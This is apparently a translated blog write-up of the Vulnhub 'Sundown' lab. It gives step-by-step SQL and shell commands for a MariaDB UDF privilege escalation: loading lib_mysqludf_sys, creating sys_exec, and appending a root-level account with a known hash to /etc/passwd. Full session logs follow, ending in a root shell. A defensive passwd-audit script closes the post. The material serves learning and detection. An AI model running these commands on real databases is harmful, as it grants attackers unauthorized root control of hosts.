Steps for MySQL Privilege Escalation, and an Explanation of One Low-Level Mistake
阿新 • Published: 2022-12-12
Suppose the target host's MySQL username and password have been obtained by some means, and we now want to execute system commands through MySQL; in that case a UDF privilege escalation can be considered. The file lib_mysqludf_sys_64.so (Kali Linux ships it) must first be uploaded to the target's /tmp directory, and then we connect to the database. In addition, a password hash for the user that will have root privileges must be generated in advance:
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo openssl passwd -1 -salt bob 123456
$1$bob$7Llv2KscjOtcMna9mt7Ps0
The goal is to append bob (with root privileges) to the /etc/passwd file, i.e.:
bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash
Then carry out the following steps in the database (use straight ASCII quotes; curly quotes ‘ ’ cause a syntax error, as the session below shows):
Step 1: use mysql;
Step 2: create a new table: create table potato(line blob);
Step 3: insert the plugin: insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
SHOW VARIABLES LIKE '%plugin%';
select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Next, in the step that inserts the username and password hash, a low-level mistake was made, namely:
select sys_exec('echo "bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
With the double quotes on the inside, the shell interprets the dollar signs ($1 and $7 are empty positional parameters and $bob is an unset variable, so they all expand to nothing), so the hash written to /etc/passwd is not what was generated and password verification fails.
As shown below:
MariaDB [mysql]> select sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 0 |
+----------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ su - jason
Password:
su: Authentication failure
In fact, simply swapping the single and double quotes in the sys_exec call makes it run correctly. The full process is as follows:
carlos@sundown:/tmp$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 161571
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.009 sec)
MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)
MariaDB [mysql]> SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)
MariaDB [mysql]> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Query OK, 0 rows affected (0.000 sec)
MariaDB [mysql]> select sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd");
+--------------------------------------------------------------------------------------------------------+
| sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd") |
+--------------------------------------------------------------------------------------------------------+
| 0 |
+--------------------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ su - bob
Password:
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# ls -alh
total 28K
drwx------ 3 root root 4.0K Aug 3 2020 .
drwxr-xr-x 18 root root 4.0K Aug 3 2020 ..
lrwxrwxrwx 1 root root 9 Aug 3 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 3 2020 .local
lrwxrwxrwx 1 root root 9 Aug 3 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.3K Aug 3 2020 proof.txt
-rw-r--r-- 1 root root 66 Aug 3 2020 .selected_editor
root@sundown:~# cat proof.txt
_____,,,\//,,\\,/,
/-- --- --- -----
///--- --- -- - ----
o////- ---- --- --
!!//o/--- -- --
o*) !///,~,,\\,\/,,/,//,,
o!*!o'(\ /\
| ! o ",) \/\ /\ / \/\
o !o! !!| \/ \/ /
( * ( o!'; |\ \ /
o o ! * !` | \ / \
o | o 'o| | : \ /
* o !*!': |o| / /
(o''| `| : / /
! *|'` \|/ \\
' !o!':\ \\ \
( ('| \ `._______/
////\\\,,\///,,,,\,/oO._* o !*!'` `.________/
---- -- ------- - -oO*OoOo (o''| /
-------- ------ 'oO*OoO!*|'o!! \
------- -- - ---- --* oO*OoO *!'| ' /
--- - ----- ---- - oO*OoO!!':o!' /
- - ----- - -- - *--oO*OoOo!` /
\\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC
510252fabb4b7e7dddd7373b7b3da3e8
Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~#
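As an added defender-side check (not part of the original post), the following Python script audits the text of a passwd file for the traces this technique leaves behind: an extra uid-0 account, a crypt hash stored in /etc/passwd instead of /etc/shadow, and a non-root account whose home directory is /root. The sample input is constructed and includes the line the post appends; the function name audit_passwd is my own.

```python
"""Audit /etc/passwd content for the traces left by a UDF-based
/etc/passwd append: an extra uid 0 account and a password hash sitting
directly in the passwd file. Pure Python, no root needed: feed it the text
of any passwd file (or the constructed sample below)."""
import re

# crypt(3) hashes start with $id$ (e.g. $1$ for MD5-crypt, $6$ for SHA-512)
_HASH_RE = re.compile(r"^\$[0-9a-z]+\$")


def audit_passwd(text: str) -> list[str]:
    """Return human-readable findings for suspicious passwd lines."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")  # name:password:uid:gid:gecos:home:shell
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid, _gid, _gecos, home, _shell = fields
        # Rule 1: only 'root' should carry uid 0.
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: {name!r} has uid 0 but is not root")
        # Rule 2: shadowed systems keep 'x' here; a hash, an empty field or any
        # other value means the password is being checked from passwd itself.
        if pw not in ("x", "*", "!", "!!"):
            kind = "crypt hash" if _HASH_RE.match(pw) else "non-standard password field"
            findings.append(f"line {lineno}: {name!r} has a {kind} in /etc/passwd")
        # Rule 3: a non-root account whose home is /root is another giveaway.
        if home == "/root" and name != "root":
            findings.append(f"line {lineno}: {name!r} uses /root as home directory")
    return findings


# Constructed sample: two normal entries followed by the line the post appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
carlos:x:1000:1000:carlos:/home/carlos:/bin/bash
bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

The same check also flags the mangled line produced by the double-quote mistake (hash field `Llv2KscjOtcMna9mt7Ps0`), since that value is neither `x` nor a valid crypt hash.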